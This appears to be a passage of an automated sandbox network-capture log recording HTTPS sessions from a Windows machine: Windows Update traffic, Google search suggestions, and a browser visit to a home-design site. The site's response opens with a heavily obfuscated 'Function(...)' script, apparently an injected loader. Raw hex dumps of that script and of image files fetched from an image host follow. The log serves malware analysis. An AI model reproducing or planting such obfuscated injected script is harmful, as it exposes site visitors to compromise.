                                                                                                                                                              Connection: close
                                                                                                                                                              X-CID: 2
                                                                                                                                                              2024-10-28 18:45:25 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                              Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              4192.168.2.1649714172.202.163.200443
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-10-28 18:45:26 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=raZlZsppxEvfrBh&MD=OrKVw8+R HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Accept: */*
                                                                                                                                                              User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                              Host: slscr.update.microsoft.com
                                                                                                                                                              2024-10-28 18:45:27 UTC560INHTTP/1.1 200 OK
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                              Expires: -1
                                                                                                                                                              Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                              ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                              MS-CorrelationId: 37c42236-e73d-484d-b27d-02d3bcfef9b5
                                                                                                                                                              MS-RequestId: a68c592c-8736-48a4-bfc0-70ccb2ca9f0f
                                                                                                                                                              MS-CV: Tw6rEsPhvkGPRaLk.0
                                                                                                                                                              X-Microsoft-SLSClientCache: 2880
                                                                                                                                                              Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              Date: Mon, 28 Oct 2024 18:45:26 GMT
                                                                                                                                                              Connection: close
                                                                                                                                                              Content-Length: 24490
                                                                                                                                                              2024-10-28 18:45:27 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                              Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                              2024-10-28 18:45:27 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                              Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              5192.168.2.1649715172.217.16.1964436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-10-28 18:45:31 UTC613OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                              Host: www.google.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              2024-10-28 18:45:31 UTC1266INHTTP/1.1 200 OK
                                                                                                                                                              Date: Mon, 28 Oct 2024 18:45:31 GMT
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              Expires: -1
                                                                                                                                                              Cache-Control: no-cache, must-revalidate
                                                                                                                                                              Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                              Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-Ad_8QMAajnygl2maybIahw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                              Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                              Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                              Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                              Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                              Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                              Accept-CH: Sec-CH-UA-Model
                                                                                                                                                              Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                              Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                              Permissions-Policy: unload=()
                                                                                                                                                              Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                              Server: gws
                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                              Accept-Ranges: none
                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                              Connection: close
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              2024-10-28 18:45:31 UTC112INData Raw: 33 30 31 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 65 70 69 73 6f 64 65 20 37 20 74 75 6c 73 61 20 6b 69 6e 67 22 2c 22 61 70 70 6c 65 20 69 6e 74 65 6c 6c 69 67 65 6e 63 65 20 69 6f 73 20 31 38 2e 31 22 2c 22 62 61 6c 74 69 6d 6f 72 65 20 72 61 76 65 6e 73 20 76 73 20 63 6c 65 76 65 6c 61 6e 64 20 62 72 6f 77 6e 73 22 2c 22 6d 6f 72 74
                                                                                                                                                              Data Ascii: 301)]}'["",["episode 7 tulsa king","apple intelligence ios 18.1","baltimore ravens vs cleveland browns","mort
                                                                                                                                                              2024-10-28 18:45:31 UTC664INData Raw: 67 61 67 65 20 72 61 74 65 73 20 74 6f 64 61 79 22 2c 22 70 6f 70 65 20 66 72 61 6e 63 69 73 20 73 79 6e 6f 64 22 2c 22 76 69 64 65 6f 73 22 2c 22 63 61 72 6f 6c 69 6e 61 20 70 61 6e 74 68 65 72 73 20 64 65 6e 76 65 72 20 62 72 6f 6e 63 6f 73 22 2c 22 61 6d 65 72 69 63 61 6e 20 61 69 72 6c 69 6e 65 73 20 62 72 69 73 62 61 6e 65 20 66 6c 69 67 68 74 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f 5a 58 4d 5c 75 30
                                                                                                                                                              Data Ascii: gage rates today","pope francis synod","videos","carolina panthers denver broncos","american airlines brisbane flight"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u0
                                                                                                                                                              2024-10-28 18:45:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              6192.168.2.1649716166.1.160.754436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-10-28 18:45:32 UTC664OUTGET / HTTP/1.1
                                                                                                                                                              Host: inspyrehomedesign.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                                                              Sec-Fetch-User: ?1
                                                                                                                                                              Sec-Fetch-Dest: document
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              2024-10-28 18:45:33 UTC280INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.26.2
                                                                                                                                                              Date: Mon, 28 Oct 2024 18:45:32 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Content-Length: 67842
                                                                                                                                                              Connection: close
                                                                                                                                                              Last-Modified: Sun, 27 Oct 2024 22:53:27 GMT
                                                                                                                                                              ETag: "10902-6257d3868c74e"
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                              2024-10-28 18:45:33 UTC16104INData Raw: 3c 73 63 72 69 70 74 3e 3b 46 75 6e 63 74 69 6f 6e 28 22 27 65 2b 76 5b 2a 79 25 35 5d 32 35 39 34 2a 7b 79 63 73 7a 23 6a 61 25 74 77 74 72 2a 40 74 77 63 7b 5f 21 5d 7e 6f 77 37 5b 5f 21 2e 6e 25 6e 2d 37 68 5e 71 65 78 2c 39 26 70 74 2c 76 2b 37 79 21 76 70 32 31 35 2d 2c 61 67 75 77 65 6d 36 2e 71 35 36 31 2a 34 78 2e 37 61 40 6b 6c 79 21 65 73 65 6d 38 39 75 72 6b 2e 2e 6e 34 66 7b 7a 7b 68 67 6a 6c 66 26 32 68 6f 25 6b 26 21 67 32 61 35 71 37 68 70 71 6e 33 2b 2d 67 63 7d 32 5b 34 2e 5e 6e 21 78 34 36 23 2a 70 66 2d 74 70 25 38 2b 68 66 2d 7d 7d 25 5f 6b 7e 40 39 6a 74 7d 65 5d 65 23 39 65 35 67 37 6b 37 76 6c 36 6f 34 32 35 69 2c 65 5d 2c 69 32 7e 79 31 75 6c 72 6d 65 6b 63 75 63 35 61 7a 6c 36 31 5e 65 5f 6b 65 6f 2d 7b 2a 25 70 23 74 6d 25 7d 77
                                                                                                                                                              Data Ascii: <script>;Function("'e+v[*y%5]2594*{ycsz#ja%twtr*@twc{_!]~ow7[_!.n%n-7h^qex,9&pt,v+7y!vp215-,aguwem6.q561*4x.7a@kly!esem89urk..n4f{z{hgjlf&2ho%k&!g2a5q7hpqn3+-gc}2[4.^n!x46#*pf-tp%8+hf-}}%_k~@9jt}e]e#9e5g7k7vl6o425i,e],i2~y1ulrmekcuc5azl61^e_keo-{*%p#tm%}w
                                                                                                                                                              2024-10-28 18:45:33 UTC16384INData Raw: 39 38 43 44 32 30 39 30 34 30 37 44 65 63 35 33 62 66 36 31 61 33 64 66 36 32 63 66 33 63 61 39 31 36 38 33 46 30 35 44 43 41 33 37 41 34 31 31 63 31 33 61 41 34 31 34 38 34 59 39 2e 63 37 43 32 63 39 39 51 36 34 38 38 34 4a 37 37 34 58 31 34 58 62 62 32 38 39 35 50 32 36 66 64 63 34 39 62 36 37 37 44 35 35 35 59 58 58 34 38 35 46 44 36 37 44 32 34 36 37 46 44 32 38 32 66 31 36 37 44 41 33 38 62 32 58 38 32 34 41 37 31 34 38 31 58 58 35 62 43 38 33 35 41 32 4d 66 37 63 65 39 35 36 31 61 37 39 65 31 35 58 62 66 66 65 35 31 43 46 33 59 41 38 2e 61 38 44 43 39 34 63 59 39 32 36 39 33 50 30 36 44 64 61 34 37 62 34 32 31 38 58 46 59 59 38 31 36 38 36 46 33 36 35 44 37 33 64 37 44 44 30 34 65 59 43 36 37 44 43 66 31 36 58 63 62 34 39 62 37 36 32 64 37 58 43 36
                                                                                                                                                              Data Ascii: 98CD2090407Dec53bf61a3df62cf3ca91683F05DCA37A411c13aA41484Y9.c7C2c99Q64884J774X14Xbb2895P26fdc49b677D555YXX485FD67D2467FD282f167DA38b2X824A71481XX5bC835A2Mf7ce9561a79e15Xbffe51CF3YA8.a8DC94cY92693P06Dda47b4218XFYY81686F365D73d7DD04eYC67DCf16Xcb49b762d7XC6
                                                                                                                                                              2024-10-28 18:45:33 UTC16384INData Raw: 38 38 28 38 37 34 65 31 34 39 59 35 66 32 32 62 41 58 31 59 38 38 46 35 36 32 63 66 33 63 61 39 31 36 38 33 66 30 35 44 65 36 34 36 58 41 36 30 63 64 33 66 39 44 31 37 35 30 38 39 5f 63 37 39 58 36 35 33 63 30 32 64 39 61 5b 37 39 30 46 30 39 32 4d 34 37 58 62 33 56 32 36 66 44 43 34 39 62 36 32 33 39 30 46 44 35 34 44 37 34 34 62 31 31 58 41 37 7c 37 41 39 31 62 39 35 43 41 4a 33 36 66 64 63 37 63 31 64 35 38 41 44 36 32 63 33 34 31 41 59 65 33 35 31 62 31 35 66 39 41 64 33 34 30 44 46 37 34 65 36 36 30 37 37 32 37 39 64 46 46 37 58 58 59 32 32 37 34 32 35 39 62 7c 38 37 61 64 38 35 32 36 66 44 41 39 39 47 33 36 44 44 33 31 38 36 41 31 38 39 31 66 64 37 30 63 65 34 34 59 37 31 39 38 59 66 30 36 36 38 36 51 46 37 41 7e 66 38 31 66 62 31 32 43 32 33 38 39
                                                                                                                                                              Data Ascii: 88(874e149Y5f22bAX1Y88F562cf3ca91683f05De646XA60cd3f9D175089_c79X653c02d9a[790F092M47Xb3V26fDC49b62390FD54D744b11XA7|7A91b95CAJ36fdc7c1d58AD62c341AYe351b15f9Ad340DF74e66077279dFF7XXY2274259b|87ad8526fDA99G36DD3186A1891fd70ce44Y7198Yf06686QF7A~f81fb12C2389
                                                                                                                                                              2024-10-28 18:45:33 UTC16384INData Raw: 5c 5c 22 23 20 5a 61 28 69 6a 69 21 3a 3d 72 62 5a 47 24 25 72 7a 4a 5c 5c 5c 5c 5c 5c 5c 22 20 33 61 5c 5c 5c 5c 5c 5c 5c 5c 4e 4c 6a 69 65 51 7d 6f 3a 3d 7c 6c 78 49 4f 49 5a 70 63 52 4f 6e 33 64 5c 5c 5c 5c 5c 5c 5c 5c 52 5c 5c 5c 5c 5c 5c 5c 5c 32 4b 2e 34 4f 4b 2f 4f 5f 6b 4b 48 3a 3d 25 6a 5d 34 5d 28 7a 7e 31 7c 32 5d 27 2b 2e 23 7d 6c 4b 31 2f 20 72 7b 23 7d 26 28 70 61 34 21 25 47 3a 3d 20 7c 27 70 61 5d 31 25 7a 2b 7d 2f 6a 4b 34 3a 3d 72 64 78 49 6f 51 61 6b 34 68 4f 67 60 3d 50 4d 34 48 3a 28 60 5b 68 4a 4b 30 30 29 64 6e 7d 23 70 7e 5d 6d 30 62 62 33 6e 7b 2a 70 23 7e 47 3a 3d 30 23 70 60 6e 4b 34 5d 5b 62 7b 64 3d 68 4a 78 49 3a 4c 5c 5c 5c 5c 5c 5c 5c 22 60 4a 4a 49 5f 52 7e 52 4b 61 7b 23 6f 3a 3d 50 5c 5c 5c 5c 5c 5c 5c 5c 2b 48 68 60 27
                                                                                                                                                              Data Ascii: \\"# Za(iji!:=rbZG$%rzJ\\\\\\\" 3a\\\\\\\\NLjieQ}o:=|lxIOIZpcROn3d\\\\\\\\R\\\\\\\\2K.4OK/O_kKH:=%j]4](z~1|2]'+.#}lK1/ r{#}&(pa4!%G:= |'pa]1%z+}/jK4:=rdxIoQak4hOg`=PM4H:(`[hJK00)dn}#p~]m0bb3n{*p#~G:=0#p`nK4][b{d=hJxI:L\\\\\\\"`JJI_R~RKa{#o:=P\\\\\\\\+Hh`'
                                                                                                                                                              2024-10-28 18:45:33 UTC2586INData Raw: 68 4b 4c 4e 28 4d 21 4b 4c 4e 65 51 5d 71 21 4c 5c 5c 5c 5c 5c 5c 5c 22 42 44 44 6d 78 35 5d 30 28 4e 5c 5c 5c 5c 5c 5c 5c 22 4d 7d 21 51 52 4e 62 7b 2d 33 6b 4e 4d 4a 28 7c 33 33 29 6c 51 62 6d 52 4c 5d 65 50 6e 49 60 72 5d 49 67 65 5c 5c 5c 5c 5c 5c 5c 5c 44 61 64 6b 78 56 71 7c 51 62 6a 7b 66 4a 4c 3d 78 74 63 78 47 64 4d 70 5a 6d 4b 51 32 49 4a 5d 50 33 52 49 69 27 4d 69 2f 5d 69 7e 6e 29 23 50 2b 4c 6a 69 4d 50 51 25 6d 4f 4e 50 4c 51 7a 41 76 49 2e 7a 66 78 74 5c 5c 5c 5c 5c 5c 5c 22 78 47 3d 65 71 66 4f 49 4f 60 4a 4f 7e 2b 4c 31 66 4f 4c 6e 61 4f 52 6f 68 4e 6b 2d 51 6a 6f 50 4d 60 33 7d 24 23 21 50 25 7c 73 65 27 66 41 76 5c 5c 5c 5c 5c 5c 5c 22 2e 7a 3d 78 74 6d 78 47 4d 4b 51 4e 4b 2a 5d 34 31 5c 5c 5c 5c 5c 5c 5c 5c 4f 71 71 31 4e 4e 7a 49 4c
                                                                                                                                                              Data Ascii: hKLN(M!KLNeQ]q!L\\\\\\\"BDDmx5]0(N\\\\\\\"M}!QRNb{-3kNMJ(|33)lQbmRL]ePnI`r]Ige\\\\\\\\DadkxVq|Qbj{fJL=xtcxGdMpZmKQ2IJ]P3RIi'Mi/]i~n)#P+LjiMPQ%mONPLQzAvI.zfxt\\\\\\\"xG=eqfOIO`JO~+L1fOLnaORohNk-QjoPM`3}$#!P%|se'fAv\\\\\\\".z=xtmxGMKQNK*]41\\\\\\\\Oqq1NNzIL


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              7192.168.2.1649720162.19.58.1574436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-10-28 18:45:34 UTC587OUTGET /t8b1Qdw/1q.png HTTP/1.1
                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                              Referer: https://inspyrehomedesign.com/
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              2024-10-28 18:45:34 UTC378INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx
                                                                                                                                                              Date: Mon, 28 Oct 2024 18:45:34 GMT
                                                                                                                                                              Content-Type: image/png
                                                                                                                                                              Content-Length: 1606
                                                                                                                                                              Connection: close
                                                                                                                                                              Last-Modified: Sun, 22 Sep 2024 08:57:32 GMT
                                                                                                                                                              Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                              Cache-Control: max-age=315360000
                                                                                                                                                              Cache-Control: public
                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                              Access-Control-Allow-Methods: GET, OPTIONS
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              2024-10-28 18:45:34 UTC1606INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 50 00 00 00 20 08 06 00 00 00 85 33 ff 6c 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c2 00 00 0e c2 01 15 28 4a 80 00 00 05 db 49 44 41 54 68 43 ed 98 7f 48 95 57 18 c7 bf e7 5e 75 5a 4c 67 33 75 b6 d4 8c 6d 45 36 9a d6 dc 62 15 a3 19 ee 8f 8c f2 07 23 1a 44 9b 6c 84 14 54 7f 88 e0 46 04 95 54 b8 a0 d8 b0 1f 90 9a 25 43 72 56 8a e8 30 63 ac 94 22 cd e9 72 6c c3 89 cd 5f 91 4c cb df f7 3d 7b ce f1 bc ef ee f5 e7 35 ef 58 af bb 1f 79 3c ef f3 3c e7 bc ef bd cf 39 cf 73 ce 7b d9 d0 d0 10 87 9b 67 c6 a2 5a 37 cf 88 3b 80 b3 e4 ff 91 c2 5d 4d b0 dd cd 05 6f 28 06 86 fb c1 5e 0c 02 02 5e 07 7b 65 25 d8 8a 78 b0 97 97 aa 8e 33 67
                                                                                                                                                              Data Ascii: PNGIHDRP 3lsRGBgAMAapHYs(JIDAThCHW^uZLg3umE6b#DlTFT%CrV0c"rl_L={5Xy<<9s{gZ7;]Mo(^^{e%x3g


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              8192.168.2.1649722169.197.85.954436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-10-28 18:45:35 UTC346OUTGET /t8b1Qdw/1q.png HTTP/1.1
                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              2024-10-28 18:45:35 UTC378INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx
                                                                                                                                                              Date: Mon, 28 Oct 2024 18:45:35 GMT
                                                                                                                                                              Content-Type: image/png
                                                                                                                                                              Content-Length: 1606
                                                                                                                                                              Connection: close
                                                                                                                                                              Last-Modified: Sun, 22 Sep 2024 08:57:32 GMT
                                                                                                                                                              Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                              Cache-Control: max-age=315360000
                                                                                                                                                              Cache-Control: public
                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                              Access-Control-Allow-Methods: GET, OPTIONS
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              2024-10-28 18:45:35 UTC1606INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 50 00 00 00 20 08 06 00 00 00 85 33 ff 6c 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c2 00 00 0e c2 01 15 28 4a 80 00 00 05 db 49 44 41 54 68 43 ed 98 7f 48 95 57 18 c7 bf e7 5e 75 5a 4c 67 33 75 b6 d4 8c 6d 45 36 9a d6 dc 62 15 a3 19 ee 8f 8c f2 07 23 1a 44 9b 6c 84 14 54 7f 88 e0 46 04 95 54 b8 a0 d8 b0 1f 90 9a 25 43 72 56 8a e8 30 63 ac 94 22 cd e9 72 6c c3 89 cd 5f 91 4c cb df f7 3d 7b ce f1 bc ef ee f5 e7 35 ef 58 af bb 1f 79 3c ef f3 3c e7 bc ef bd cf 39 cf 73 ce 7b d9 d0 d0 10 87 9b 67 c6 a2 5a 37 cf 88 3b 80 b3 e4 ff 91 c2 5d 4d b0 dd cd 05 6f 28 06 86 fb c1 5e 0c 02 02 5e 07 7b 65 25 d8 8a 78 b0 97 97 aa 8e 33 67
                                                                                                                                                              Data Ascii: PNGIHDRP 3lsRGBgAMAapHYs(JIDAThCHW^uZLg3umE6b#DlTFT%CrV0c"rl_L={5Xy<<9s{gZ7;]Mo(^^{e%x3g


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              9192.168.2.1649723172.202.163.200443
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-10-28 18:46:04 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=raZlZsppxEvfrBh&MD=OrKVw8+R HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Accept: */*
                                                                                                                                                              User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                              Host: slscr.update.microsoft.com
                                                                                                                                                              2024-10-28 18:46:04 UTC560INHTTP/1.1 200 OK
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                              Expires: -1
                                                                                                                                                              Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                              ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                                                              MS-CorrelationId: c23faf69-c0c4-4e57-bf8d-cccb78267141
                                                                                                                                                              MS-RequestId: abd692b7-9da2-438e-95f8-d9365aac8573
                                                                                                                                                              MS-CV: KMbLgFMLH0O3kZG5.0
                                                                                                                                                              X-Microsoft-SLSClientCache: 1440
                                                                                                                                                              Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              Date: Mon, 28 Oct 2024 18:46:04 GMT
                                                                                                                                                              Connection: close
                                                                                                                                                              Content-Length: 30005
